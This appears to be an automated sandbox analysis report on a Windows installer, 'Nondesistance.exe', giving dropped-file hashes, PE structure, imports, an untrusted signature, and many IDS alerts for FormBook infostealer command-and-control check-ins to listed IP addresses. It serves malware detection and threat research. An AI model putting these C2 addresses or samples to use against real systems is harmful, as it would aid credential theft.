                                                                                                Preview:..........r..................hhhhhh.......VV.......................................II..............[[..........C..................~....~~........*..h.sss..K.BBB..{.........K......yy..................................;;................AA.................U..zzzzzz.e.b.................................J...........p.`..e...m...................................................H.........__......a.22......................111..........99......G.cc.....1..}}}}}...............$...........C.....................................r.........w._......ssss.......E.E......A.:::....i..........PP.......................p.........ZZZZ.. .............................A........[[...;.(...c..%.yyyyy.........B.**.......{{.......................)....../.......................%.......z..............yyy.......w..JJJJJ..............................................99..................................t.....|...........................[[.kk...t...s......._...GGGGGGG.!...........>...........]].......................''...s..

                                                                                                C:\Users\user\dewater\reinsmen\Undisclaimed.smi

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1156117
                                                                                                Entropy (8bit):0.15837846074819772
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:lw/QDanxkHslOtDNAzJhjvMhXij4BgUdFaCLRgWLdGvI6r2C:
                                                                                                MD5:15086A2F35483FA21698895B6782DF8E
                                                                                                SHA1:6AD798618E183D7FEBF163B039C3AE2FB50B2CD9
                                                                                                SHA-256:4B0C2B861F5C47806E6867575455247161434E204ADB92AB64E4833704A766D4
                                                                                                SHA-512:7E350909621DC8E8E3AA306345B51A5EFFC6539A505797CCD41C26757DD57ABEBC812A2DA0BCB75E1352FD9CC1BFC01988E646C8B979EBF11C5358BBE945E2F1
                                                                                                Malicious:false
                                                                                                Preview:.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................C.......................................................................................................................................................................................................................................................................................................................................................................................................\......................................................................

                                                                                                C:\Users\user\dewater\reinsmen\blyindholdene.irr

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1082113
                                                                                                Entropy (8bit):0.15825869931191344
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:y2tg6J3SwdsrlFv3IPRJhGeRG0KNBTIIxWTn69lRFHoDmO:2c
                                                                                                MD5:C2380BB148EBA394BBCAAE245586A67F
                                                                                                SHA1:020741FF474FC23B667F62EDD835D4C49E2A92DF
                                                                                                SHA-256:DE656771FCE0CF164EB1876321D1EC9033DA5BE088B07F98EBAA6F9CABBFC149
                                                                                                SHA-512:264F1832D6E002948F9EACA63EF663580557F7D8B21143D2E3BB06D1F07797C2428674ED9EAF67FE308B98D8A4964794118B2AAAE8CBAB01EBA4EB139D4400AE
                                                                                                Malicious:false
                                                                                                Preview:........................................................................................................................................................................................................................................................Q................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................h..............................................................................................................................................

                                                                                                C:\Users\user\dewater\reinsmen\danite.txt

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):483
                                                                                                Entropy (8bit):4.2279428457950745
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:bFgRYHQ/LqFV/mMka7LsQIaKfMJ10bQSEX/bNs2LvKAVTKn:bFgouWH/mMkpQRXJ10sSEPb7CmTKn
                                                                                                MD5:7822DA4CB788A4E45B36549F28A392C8
                                                                                                SHA1:9B9AD515D5B1042E6C6C3D7F766AA318D69AF5A2
                                                                                                SHA-256:B08B0B8C9E2DC6B97815501883D21EC3849A978B91ABE0B685FAD68C6272411B
                                                                                                SHA-512:FEB7336D0A92134F25EF9814C643CE903A0C4816E887FA040CC890DEB428083C17BE97EE120E9B43C176405B6F6E6CDF9B504D6D3B5C22E18E70EE69C5C32E78
                                                                                                Malicious:false
                                                                                                Preview:statsrevisors noninstitutionally despairs amphistomatic inclination speciated etagen.piruetter nodestativ polyamylose afresca legions superincumbently prisndringers postaxiad bottomrying sekstendedelsnodernes fascis huastec..smergledes srbeskatningens filologiens slaaerens sextains,prehensorial misundelsesvrdigeres anchors riotry blgvanters.siliqua amtsligningsraadenes pulses kyra suffisance thumbing stomatorrhagia..unitude nonagrarian retear embowl slageren gaardhaven swarajes.

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                Entropy (8bit):6.212836401994695
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:Nondesistance.exe
                                                                                                File size:878'808 bytes
                                                                                                MD5:9695b61f42f2e5a77e2e8d29963fe980
                                                                                                SHA1:92396f929ffc0ec1c2929dcba7fa2b3de5859bc0
                                                                                                SHA256:1c6b868bda50a13de084c97460436742b1636b75e60708eeecb9c44d574ccce9
                                                                                                SHA512:58921b73bcd5986bd568bf9d7adcfb737c0fd42e873924f183ea1197d669902842c23b191a12bf0446cb9fbe644fd10ff5418d0c125e69f6393c6e1c8ddef0bb
                                                                                                SSDEEP:12288:ZVcDbJfzoHrfKapRad9PqECAkRQkWw4QSsOWatBhP5FnM:4DbJfzUrCaSLPqECAkRWtTPM
                                                                                                TLSH:F8159C16B7B48A13C10747338CA38BD56275EF94AE629B0F3258B2196F713EF07462D6
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....z.W.................`...|.....

                                                                                                File Icon

                                                                                                Icon Hash:7b29343736230907

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x40310f
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x57017AB3 [Sun Apr 3 20:18:59 2016 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de

                                                                                                Authenticode Signature

                                                                                                Signature Valid:false
                                                                                                Signature Issuer:E=Dagln@ruralism.El, O=Hvalrosserne, OU="Transcendentalized Giftemoden ", CN=Hvalrosserne, L=Juvanz\xe9, S=Grand Est, C=FR
                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                Error Number:-2146762487
                                                                                                Not Before, Not After
                                                                                                • 01/04/2024 08:46:43 01/04/2027 08:46:43
                                                                                                Subject Chain
                                                                                                • E=Dagln@ruralism.El, O=Hvalrosserne, OU="Transcendentalized Giftemoden ", CN=Hvalrosserne, L=Juvanz\xe9, S=Grand Est, C=FR
                                                                                                Version:3
                                                                                                Thumbprint MD5:8D105C0C6085F945D3F5F7E86F35AFCC
                                                                                                Thumbprint SHA-1:1A750729FC907CE0EF0427253002457A2BA98ABC
                                                                                                Thumbprint SHA-256:FF0CB3B10B1950EDD600C121B64451FE8063F88F4A64AD3F00113079E45E9EFC
                                                                                                Serial:111C3B47C01A9D77B4B65F7933B21D62CFAECA4C

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                sub esp, 00000184h
                                                                                                push ebx
                                                                                                push esi
                                                                                                push edi
                                                                                                xor ebx, ebx
                                                                                                push 00008001h
                                                                                                mov dword ptr [esp+18h], ebx
                                                                                                mov dword ptr [esp+10h], 00409198h
                                                                                                mov dword ptr [esp+20h], ebx
                                                                                                mov byte ptr [esp+14h], 00000020h
                                                                                                call dword ptr [004070A8h]
                                                                                                call dword ptr [004070A4h]
                                                                                                cmp ax, 00000006h
                                                                                                je 00007F2E80AC0923h
                                                                                                push ebx
                                                                                                call 00007F2E80AC3891h
                                                                                                cmp eax, ebx
                                                                                                je 00007F2E80AC0919h
                                                                                                push 00000C00h
                                                                                                call eax
                                                                                                mov esi, 00407298h
                                                                                                push esi
                                                                                                call 00007F2E80AC380Dh
                                                                                                push esi
                                                                                                call dword ptr [004070A0h]
                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                cmp byte ptr [esi], bl
                                                                                                jne 00007F2E80AC08FDh
                                                                                                push ebp
                                                                                                push 00000009h
                                                                                                call 00007F2E80AC3864h
                                                                                                push 00000007h
                                                                                                call 00007F2E80AC385Dh
                                                                                                mov dword ptr [0042E404h], eax
                                                                                                call dword ptr [00407044h]
                                                                                                push ebx
                                                                                                call dword ptr [00407288h]
                                                                                                mov dword ptr [0042E4B8h], eax
                                                                                                push ebx
                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                push 00000160h
                                                                                                push eax
                                                                                                push ebx
                                                                                                push 00428828h
                                                                                                call dword ptr [00407174h]
                                                                                                push 00409188h
                                                                                                push 0042DC00h
                                                                                                call 00007F2E80AC3487h
                                                                                                call dword ptr [0040709Ch]
                                                                                                mov ebp, 00434000h
                                                                                                push eax
                                                                                                push ebp
                                                                                                call 00007F2E80AC3475h
                                                                                                push ebx
                                                                                                call dword ptr [00407154h]

                                                                                                Rich Headers

                                                                                                Programming Language:
                                                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x75340xa0.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x70d00.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xd54800x1458
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x5fdd0x600062681be921484302edbc551e93c6d357False0.6784261067708334data6.499724004795778IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rdata0x70000x13520x14003d134ae5961af9895950a7ee0adc520aFalse0.4583984375data5.207538993430304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .data0x90000x254f80x6002d00401e0c64d69b6d0ccb877d9f624eFalse0.4544270833333333data4.0323505938358934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .ndata0x2f0000x190000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .rsrc0x480000x70d000x70e00ee0de397650a8a3850a4c21fb750a9e0False0.2557144587486157data3.819328483239704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_ICON0x483b80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.2202007574636802
                                                                                                RT_ICON0x8a3e00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2796048740092275
                                                                                                RT_ICON0x9ac080x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.30720517132646624
                                                                                                RT_ICON0xa40b00x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.326203007518797
                                                                                                RT_ICON0xaa8980x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.34015711645101665
                                                                                                RT_ICON0xafd200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.35657770429853564
                                                                                                RT_ICON0xb3f480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3848547717842324
                                                                                                RT_ICON0xb64f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.46646341463414637
                                                                                                RT_ICON0xb75980x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5163934426229508
                                                                                                RT_ICON0xb7f200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5966312056737588
                                                                                                RT_DIALOG0xb83880x100dataEnglishUnited States0.5234375
                                                                                                RT_DIALOG0xb84880x11cdataEnglishUnited States0.6056338028169014
                                                                                                RT_DIALOG0xb85a80xc4dataEnglishUnited States0.5918367346938775
                                                                                                RT_DIALOG0xb86700x60dataEnglishUnited States0.7291666666666666
                                                                                                RT_GROUP_ICON0xb86d00x92dataEnglishUnited States0.6986301369863014
                                                                                                RT_VERSION0xb87680x258dataEnglishUnited States0.49166666666666664
                                                                                                RT_MANIFEST0xb89c00x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                                                                Imports

                                                                                                DLLImport
                                                                                                KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                                                USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                Possible Origin

                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States

                                                                                                Network Behavior

                                                                                                Snort IDS Alerts

                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                05/27/24-12:32:40.090613TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984880192.168.11.3091.195.240.123
                                                                                                05/27/24-12:36:01.122880TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34989780192.168.11.3091.195.240.123
                                                                                                05/27/24-12:36:20.767832TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24990380192.168.11.30183.111.161.243
                                                                                                05/27/24-12:32:26.454904TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984480192.168.11.30203.161.49.193
                                                                                                05/27/24-12:34:27.725976TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34987680192.168.11.30147.92.36.247
                                                                                                05/27/24-12:35:47.645599TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34989380192.168.11.30203.161.49.193
                                                                                                05/27/24-12:35:11.789697TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34988580192.168.11.3064.190.62.22
                                                                                                05/27/24-12:36:12.299229TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34990080192.168.11.30183.111.161.243
                                                                                                05/27/24-12:38:01.911180TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24992580192.168.11.3079.98.25.1
                                                                                                05/27/24-12:33:01.067777TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24985480192.168.11.30183.111.161.243
                                                                                                05/27/24-12:32:52.571681TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34985180192.168.11.30183.111.161.243
                                                                                                05/27/24-12:36:34.548211TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24990780192.168.11.303.64.163.50
                                                                                                05/27/24-12:38:12.948901TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24992780192.168.11.303.73.27.108
                                                                                                05/27/24-12:34:58.190056TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34988180192.168.11.3079.98.25.1
                                                                                                05/27/24-12:33:59.569233TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34986880192.168.11.3084.32.84.32
                                                                                                05/27/24-12:35:44.956448TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34989280192.168.11.30203.161.49.193
                                                                                                05/27/24-12:32:01.308526TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983980192.168.11.303.73.27.108
                                                                                                05/27/24-12:33:32.048609TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34986080192.168.11.30217.70.184.50
                                                                                                05/27/24-12:36:51.487436TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34990980192.168.11.30116.203.164.244
                                                                                                05/27/24-12:33:56.932565TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34986780192.168.11.3084.32.84.32
                                                                                                05/27/24-12:32:31.832166TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24984680192.168.11.30203.161.49.193
                                                                                                05/27/24-12:37:37.898952TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34992080192.168.11.3076.223.67.189
                                                                                                05/27/24-12:34:50.099581TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24987980192.168.11.30208.112.85.150
                                                                                                05/27/24-12:35:58.404426TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34989680192.168.11.3091.195.240.123
                                                                                                05/27/24-12:36:29.112955TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34990580192.168.11.303.64.163.50
                                                                                                05/27/24-12:36:48.771430TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34990880192.168.11.30116.203.164.244
                                                                                                05/27/24-12:37:05.560664TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34991380192.168.11.30185.215.4.19
                                                                                                05/27/24-12:33:15.123573TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24985880192.168.11.303.64.163.50
                                                                                                05/27/24-12:38:59.018936TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24993380192.168.11.30185.253.215.17
                                                                                                05/27/24-12:33:51.153017TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24986680192.168.11.3091.195.240.123
                                                                                                05/27/24-12:34:33.421188TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24987880192.168.11.30147.92.36.247
                                                                                                05/27/24-12:38:23.904167TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24992880192.168.11.30203.161.49.193
                                                                                                05/27/24-12:32:04.016634TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984080192.168.11.303.73.27.108
                                                                                                05/27/24-12:31:54.583592TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983880192.168.11.3064.190.62.22
                                                                                                05/27/24-12:37:10.871109TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24991580192.168.11.30185.215.4.19
                                                                                                05/27/24-12:34:55.443005TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34988080192.168.11.3079.98.25.1
                                                                                                05/27/24-12:35:03.657162TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24988380192.168.11.3079.98.25.1
                                                                                                05/27/24-12:32:55.391432TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34985280192.168.11.30183.111.161.243
                                                                                                05/27/24-12:31:46.436699TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983580192.168.11.3064.190.62.22
                                                                                                05/27/24-12:33:29.346239TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34985980192.168.11.30217.70.184.50
                                                                                                05/27/24-12:37:02.912526TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34991280192.168.11.30185.215.4.19
                                                                                                05/27/24-12:31:40.814068TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983480192.168.11.3079.98.25.1
                                                                                                05/27/24-12:33:37.453709TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24986280192.168.11.30217.70.184.50
                                                                                                05/27/24-12:37:56.573241TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24992480192.168.11.30208.112.85.150
                                                                                                05/27/24-12:31:32.596218TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983180192.168.11.3079.98.25.1
                                                                                                05/27/24-12:32:37.370163TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984780192.168.11.3091.195.240.123
                                                                                                05/27/24-12:39:04.563126TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24993480192.168.11.303.64.163.50
                                                                                                05/27/24-12:32:45.526108TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24985080192.168.11.3091.195.240.123
                                                                                                05/27/24-12:35:09.071712TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34988480192.168.11.3064.190.62.22
                                                                                                05/27/24-12:31:16.583331TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24982980192.168.11.30208.112.85.150
                                                                                                05/27/24-12:36:56.923016TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24991180192.168.11.30116.203.164.244
                                                                                                05/27/24-12:35:22.847505TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34988880192.168.11.303.73.27.108
                                                                                                05/27/24-12:37:40.524446TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34992180192.168.11.3076.223.67.189
                                                                                                05/27/24-12:38:40.644901TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24993180192.168.11.303.64.163.50
                                                                                                05/27/24-12:35:17.225872TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24988780192.168.11.3064.190.62.22
                                                                                                05/27/24-12:35:53.016457TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24989580192.168.11.30203.161.49.193
                                                                                                05/27/24-12:34:04.848986TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24987080192.168.11.3084.32.84.32
                                                                                                05/27/24-12:31:35.330244TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983280192.168.11.3079.98.25.1
                                                                                                05/27/24-12:33:09.690678TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34985680192.168.11.303.64.163.50
                                                                                                05/27/24-12:38:07.328663TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24992680192.168.11.3064.190.62.22
                                                                                                05/27/24-12:35:31.002949TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24989180192.168.11.303.73.27.108
                                                                                                05/27/24-12:36:26.393095TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34990480192.168.11.303.64.163.50
                                                                                                05/27/24-12:37:45.774029TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24992380192.168.11.3076.223.67.189
                                                                                                05/27/24-12:32:09.450151TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24984280192.168.11.303.73.27.108
                                                                                                05/27/24-12:36:06.561854TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24989980192.168.11.3091.195.240.123
                                                                                                05/27/24-12:39:15.195832TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24993680192.168.11.30208.112.85.150
                                                                                                05/27/24-12:38:53.289335TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24993280192.168.11.30203.161.49.193
                                                                                                05/27/24-12:33:45.715686TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34986480192.168.11.3091.195.240.123
                                                                                                05/27/24-12:32:23.763503TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984380192.168.11.30203.161.49.193
                                                                                                05/27/24-12:33:42.997051TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34986380192.168.11.3091.195.240.123
                                                                                                05/27/24-12:38:35.017545TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24993080192.168.11.30183.111.161.243
                                                                                                05/27/24-12:33:06.969628TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34985580192.168.11.303.64.163.50
                                                                                                05/27/24-12:35:25.568823TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34988980192.168.11.303.73.27.108
                                                                                                05/27/24-12:38:29.292431TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24992980192.168.11.3091.195.240.123
                                                                                                05/27/24-12:39:25.582552TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24993780192.168.11.30208.112.85.150
                                                                                                05/27/24-12:34:24.884091TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34987580192.168.11.30147.92.36.247
                                                                                                05/27/24-12:31:49.147726TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983680192.168.11.3064.190.62.22
                                                                                                05/27/24-12:36:15.124753TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34990180192.168.11.30183.111.161.243

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                May 27, 2024 12:30:45.625415087 CEST49827443192.168.11.30142.251.16.101
                                                                                                May 27, 2024 12:30:45.625432014 CEST44349827142.251.16.101192.168.11.30
                                                                                                May 27, 2024 12:30:45.625585079 CEST49827443192.168.11.30142.251.16.101
                                                                                                May 27, 2024 12:30:45.636960983 CEST49827443192.168.11.30142.251.16.101
                                                                                                May 27, 2024 12:30:45.636969090 CEST44349827142.251.16.101192.168.11.30
                                                                                                May 27, 2024 12:30:45.866178989 CEST44349827142.251.16.101192.168.11.30
                                                                                                May 27, 2024 12:30:45.866338015 CEST49827443192.168.11.30142.251.16.101
                                                                                                May 27, 2024 12:30:45.866925001 CEST44349827142.251.16.101192.168.11.30
                                                                                                May 27, 2024 12:30:45.867167950 CEST49827443192.168.11.30142.251.16.101
                                                                                                May 27, 2024 12:30:45.911824942 CEST49827443192.168.11.30142.251.16.101
                                                                                                May 27, 2024 12:30:45.911834955 CEST44349827142.251.16.101192.168.11.30
                                                                                                May 27, 2024 12:30:45.912108898 CEST44349827142.251.16.101192.168.11.30
                                                                                                May 27, 2024 12:30:45.912292004 CEST49827443192.168.11.30142.251.16.101
                                                                                                May 27, 2024 12:30:45.915193081 CEST49827443192.168.11.30142.251.16.101
                                                                                                May 27, 2024 12:30:45.956197023 CEST44349827142.251.16.101192.168.11.30
